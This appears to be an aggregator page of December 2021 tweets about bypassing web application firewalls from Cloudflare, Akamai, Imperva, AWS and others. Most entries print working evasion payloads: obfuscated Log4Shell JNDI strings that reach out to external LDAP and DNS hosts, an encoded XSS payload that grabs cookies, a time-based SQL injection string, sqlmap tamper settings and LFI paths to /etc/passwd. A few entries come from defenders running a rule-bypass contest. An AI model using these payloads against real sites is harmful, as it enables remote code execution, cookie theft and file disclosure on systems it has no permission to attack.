WAF bypass by CoreRuleSet

We have a honorary mention in our @coreruleset #log4j #WAF bypass contest. @denisaugsburger has managed to bypass our new log4j rule (but was detected ... December 23, 2021

CloudFlare

CloudFlare bypass by cKure7

????? Log4j Cloudflare bypass. ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ ... December 23, 2021

SQL injection

WAF bypass SQL injection by steiner254

for sqlmap bypass waf use this --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoa ... December 22, 2021

WAF bypass by Brumens2

Firewall bypassed methology #Hacking #bugbountytips #bugounty #payloads >Connect VPN/Proxy >Run a waf/technology scan >Select 3-5 different d ... December 22, 2021

Imperva

Imperva bypass by cycatz2

#bugbountytips #bugbounty How I Bypassed Incapsula WAF By Imperva #Pentesting #appsec #WAF 1. Vulnerability 2. How I bypassed #Incapsula WAF 3. ... December 22, 2021

WAF bypass by hasanakajan

I just published How I was able to bypass WAF and find the origin IP and a few sensitive files https://t.co/Y5PGXFZoh5 ... December 22, 2021

WAF bypass by meatarchist

So much for blocking log4j CVEs with your WAF ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z} https://t.co ... December 20, 2021

WAF bypass by hacktivist1337

If you are blocked by a waf and cannot bypass it, retest on different days of the week. my target site blocked me every day except Wednesday and Sunda ... December 20, 2021

WAF bypass by CoreRuleSet

So we had a bypass in our #log4j / #log4shell / CVE-2021-44228 rule: Dominik Strecker from Swiss branch of @syracomag exploited a bug in the XML XPath ... December 20, 2021

SQL injection

WAF bypass SQL injection by SecurityOsaka

#Cloudbric Web??????? ???????:?? ???????SQL???????? Simple Issue Tracker System 1.0 - SQLi Authentication Bypass???? ???????Cloudbric?????????? #WAF ... December 20, 2021

WAF bypass by MT6572A

you better test for log4j behind your waf, because you know they're just gonna find a way to bypass that shit anyway ... December 20, 2021

WAF bypass by MalwareLion

Am i the only one that only sees the normal and the WAF bypass patterns, but not the localhost bypass in current scanning activities? #blueteam #log4j ... December 19, 2021

CloudFlare

CloudFlare bypass by alicanact60

Can anyone who has cloudflare log4j bypass share it with me via DM? ... December 19, 2021

CloudFlare

CloudFlare bypass by akita_zen

Someone bypass Cloudflare WAF for log4j? :) asking for a friend :) #bugbounty #cloudflare #log4jshell #log4j ... December 19, 2021

CloudFlare , SQL injection

CloudFlare bypass SQL injection by Anastasis_King

How i was able to bypass Cloudflare WAF for SQLi payload https://t.co/yN4mHPyKkz #Pentesting #SQLi #CloudFlare #CyberSecurity #Infosec ... December 18, 2021

AWS WAF

WAF bypass by TeriRadichel

WAFs are a good measure but they probably won’t save you. Focus on the root problem. Of course you can also update your AWS WAF rules to address thi ... December 18, 2021

AWS WAF , LDAP injection

WAF bypass LDAP injection by nxtexploit

Previous AWS WAF bypass is patched.. here is another: ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} #bugbountytips #log4j ??? ... December 18, 2021

CloudFlare

CloudFlare bypass by FreelanceJobRSS

#DNS #Linux Connect my vps server to cloudflare ssl: Hi, i want to connect my DNS with cloudflare account. I can only pay Rs.500 (Budget: ?600 - ?1500 ... December 18, 2021

WAF bypass by CoreRuleSet

#log4j is also affected by a #DoS vulnerability CVE-2021-45105. At this point, we believe our new rule and mitigations has your back here as well. But ... December 18, 2021

AWS WAF , XSS

WAF bypass XSS by norahul1020

Got a AWS WAF bypass for #log4j2. Endpoints to exploit it?? @theXSSrat @HemantSolo @ADITYASHENDE17 ... December 18, 2021

WAF bypass by bararchy

WAF, or in other words, 1 hour of grace before bypass https://t.co/weJOzYndph ... December 17, 2021

WAF bypass by SidiJunior

Problem with WAF? Ideas to bypass? Look this payloads to ur tests: #cybersecurity #pentest #bugbounty #bugbountytips https://t.co/OncqUaE3jB ... December 17, 2021

AWS WAF , LDAP injection

WAF bypass LDAP injection by zapstiko

Previous AWS WAF bypass is patched.. here is another: @11xuxx ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} #bugbountytips #LOG4JDO ... December 17, 2021

Akamai , SQL injection

Akamai bypass SQL injection by SidiJunior

Ideas n Tips to ur tests n hunts: Akamai WAF Bypass & SQLi (Bio bellow) 'XOR(if(now()=sysdate(),sleep(5*5),0))OR' #bugbountytips #BugBounty #Cy ... December 17, 2021

Akamai

Akamai bypass by LazySaad

akamai waf bypass Enjoy B: %3Cimg%20sr%u0025%u0036%u0033=x%20o%u0025%u0036%u0065error=aler%u0025%u0037%u0034(documen%u0025%u0037%u0034.cookie)%3E #bug ... December 17, 2021

WAF bypass by LazySaad

I'm looking for website runing akamia waf with unfiltered tags i guess i found a new bypass After test bypass will be published ??? #bugbountytips ... December 17, 2021

AWS WAF , LDAP injection

WAF bypass LDAP injection by simrotion13

AWS WAF bypass ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydnsserver.com:1389/o} #bugbountytips #log4j #waf ... December 17, 2021

WAF bypass by zapstiko

(1/2) LFI WAF Bypass @TodayCyberNews file:/etc/passwd?/ file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/?/../passwd f ... December 17, 2021

WAF bypass by D0rkerDevil

If you are looking to do active scanning of assets for the log4j jndi inject vuln . try out this scanner * New waf bypass payload(s) added https:/ ... December 17, 2021

AWS WAF , LDAP injection

WAF bypass LDAP injection by 11xuxx

Previous AWS WAF bypass is patched.. here is another: ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} #bugbountytips #LOG4JDONTRELYON ... December 17, 2021